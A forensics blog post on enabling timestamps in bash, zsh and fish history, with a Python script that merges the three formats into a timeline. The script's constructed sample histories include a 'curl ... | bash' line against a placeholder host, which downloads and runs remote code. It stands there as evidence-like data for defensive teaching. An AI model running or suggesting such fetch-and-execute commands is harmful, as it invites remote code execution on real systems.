
Two-minute InfoSec — Shell History Timestamps

Chapin Bryce. Originally published at Medium. 2 min read


A new series sharing quick wins for organizational security, forensic investigations, incident response and more, each of which you can implement in two minutes or less.

Photo by Kaitlyn Baker on Unsplash

Today's post focuses on a feature of nearly every shell: command history. The history file is a rich source of evidence of prior user activity, especially on Linux/Unix/macOS systems. One major drawback is that, in most shells, this file does not store timestamps by default, which makes analysis of the data difficult and costs a lot of valuable investigative time. Bear in mind that history is written by the user's own shell: bash, for example, only flushes it to disk when the session ends, and a user can disable, clear or edit it, so treat it as a lead to corroborate against other artifacts rather than a complete record.

In this post we will cover how to quickly implement timestamps in some common shells including:

  • Bash
  • Zsh
  • Fish

Not all Linux/Unix/macOS platforms are made the same! These are general ways to accomplish this goal, but always test before putting things into production.

Bash

To enable this for a user account, add the line below to ~/.bashrc (or ~/.bash_profile, depending on how that account's shells are started):

export HISTTIMEFORMAT="%F %T %z "

(Note there is no space around the = sign; with a space, bash treats the value as a second, invalid variable name and the setting is never applied.) Setting HISTTIMEFORMAT does two things: the history builtin displays a formatted timestamp beside each entry, and bash starts writing the epoch time of each command into the history file as a #<seconds> comment line preceding the command. That second effect is what preserves timestamps across sessions and what an investigator will find in ~/.bash_history. Commands recorded before the variable was set remain unstamped.

The same line can be placed in /etc/bashrc (Red Hat family) or /etc/bash.bashrc (Debian/Ubuntu), or in a drop-in file under /etc/profile.d/, to load across user profiles. It only takes effect in shells started after the change, so open a new shell and confirm that history now prints a timestamp beside each entry.

Source: https://linux.die.net/man/1/bash

Zsh

For user accounts, add the line below to ~/.zshrc; add it to /etc/zshrc for a system-wide implementation.

setopt EXTENDED_HISTORY

This records not only the timestamp of execution but also the duration of the command, a very handy data point in investigations! With this option set, zsh writes each history entry as : <start epoch>:<elapsed seconds>;<command>. Some zsh configurations already enable it, though it doesn't hurt to check: running setopt with no arguments lists the options currently in effect.

Source: http://zsh.sourceforge.net/Doc/Release/Options.html#Options

Fish

Fish records timestamps by default, so there is nothing to enable. Do check where the history file lives, though. By default it is:

~/.local/share/fish/fish_history

(the location follows XDG_DATA_HOME if that is set). Each entry is stored as a - cmd: line followed by a when: line holding the epoch time of execution.
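The payoff of all three settings above (bash's #<epoch> lines, zsh's : <epoch>:<elapsed>; prefix and fish's when: field) is that the files can be merged into one timeline. The script below is an added example, not code from the original post, that parses the three formats and sorts the results, pushing entries that carry no timestamp to the end so their unknown position is obvious. The history snippets it reads are constructed for the example, not captured from a real host, and the example.invalid URL is a placeholder.

```python
"""Normalize bash, zsh and fish history files into one timestamped timeline.

Added example; the history snippets below are constructed, not taken from a host.
"""
import re
from dataclasses import dataclass
from datetime import datetime, timezone
from typing import Iterable, List, Optional

# Constructed sample: ~/.bash_history written with HISTTIMEFORMAT set.
# Each '#<epoch>' line stamps the command that follows it; commands recorded
# before the setting was enabled have no stamp at all.
BASH_HISTORY = """\
#1583416800
ls -la /tmp
#1583416812
curl http://example.invalid/x.sh | bash
# an ordinary comment typed at the prompt is not a timestamp
echo done
"""

# Constructed sample: ~/.zsh_history with EXTENDED_HISTORY,
# ': <start epoch>:<elapsed seconds>;<command>'. A plain line predates the option.
ZSH_HISTORY = """\
: 1583416800:0;ls -la /tmp
: 1583416812:3;curl http://example.invalid/x.sh | bash
echo no timestamp recorded
"""

# Constructed sample: ~/.local/share/fish/fish_history ('- cmd:' plus 'when:').
FISH_HISTORY = """\
- cmd: ls -la /tmp
  when: 1583416800
- cmd: curl http://example.invalid/x.sh | bash
  when: 1583416812
  paths:
    - /tmp
"""


@dataclass
class HistoryEntry:
    shell: str
    command: str
    started: Optional[datetime]      # None when no timestamp was recorded
    elapsed: Optional[int] = None    # seconds; only zsh records this


def _epoch(value: str) -> datetime:
    return datetime.fromtimestamp(int(value), tz=timezone.utc)


_BASH_STAMP = re.compile(r"^#(\d+)$")


def parse_bash(text: str) -> List[HistoryEntry]:
    entries: List[HistoryEntry] = []
    pending: Optional[datetime] = None
    for line in text.splitlines():
        stamp = _BASH_STAMP.match(line)
        if stamp:
            pending = _epoch(stamp.group(1))  # applies to the next command only
            continue
        if line.strip():
            entries.append(HistoryEntry("bash", line, pending))
            pending = None
    return entries


_ZSH_EXT = re.compile(r"^: (\d+):(\d+);(.*)$")


def parse_zsh(text: str) -> List[HistoryEntry]:
    entries: List[HistoryEntry] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ext = _ZSH_EXT.match(line)
        if ext:
            started, elapsed, command = _epoch(ext.group(1)), int(ext.group(2)), ext.group(3)
            entries.append(HistoryEntry("zsh", command, started, elapsed))
        else:
            entries.append(HistoryEntry("zsh", line, None))
    return entries


def parse_fish(text: str) -> List[HistoryEntry]:
    entries: List[HistoryEntry] = []
    for line in text.splitlines():
        if line.startswith("- cmd: "):
            entries.append(HistoryEntry("fish", line[len("- cmd: "):], None))
        elif line.startswith("  when: ") and entries:
            entries[-1].started = _epoch(line[len("  when: "):].strip())
        # 'paths:' and its nested '    - ' items carry no timing data; skipped
    return entries


def build_timeline(entries: Iterable[HistoryEntry]) -> List[HistoryEntry]:
    """Sort by start time; unstamped entries cannot be placed and sort last."""
    unknown = datetime.max.replace(tzinfo=timezone.utc)
    return sorted(entries, key=lambda e: e.started or unknown)


def render(entries: Iterable[HistoryEntry]) -> List[str]:
    """One row per entry: ISO timestamp (or '?'), shell, elapsed, command."""
    rows = []
    for e in entries:
        when = e.started.isoformat() if e.started else "?"
        took = f"{e.elapsed}s" if e.elapsed is not None else "-"
        rows.append(f"{when}\t{e.shell}\t{took}\t{e.command}")
    return rows


if __name__ == "__main__":
    everything = parse_bash(BASH_HISTORY) + parse_zsh(ZSH_HISTORY) + parse_fish(FISH_HISTORY)
    for row in render(build_timeline(everything)):
        print(row)
```

The unstamped rows at the bottom of the output are the point of the post: without HISTTIMEFORMAT or EXTENDED_HISTORY in place before the incident, those commands can only be ordered relative to their neighbours, not placed against other evidence such as auth logs or file modification times. Timestamps are rendered in UTC; convert to the host's local zone deliberately rather than implicitly when correlating with other sources.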

Have another shell you use and prefer, or an alternative implementation on a specific OS? Comment and we can add it to this post for ease of future reference!

Posted on Mar 5 by Chapin Bryce (@chapindb)

Digital Forensics ⚡ Incident Response Professional, Ski Bum, Author of Learning Python for Forensics and Python Forensics Cookbook
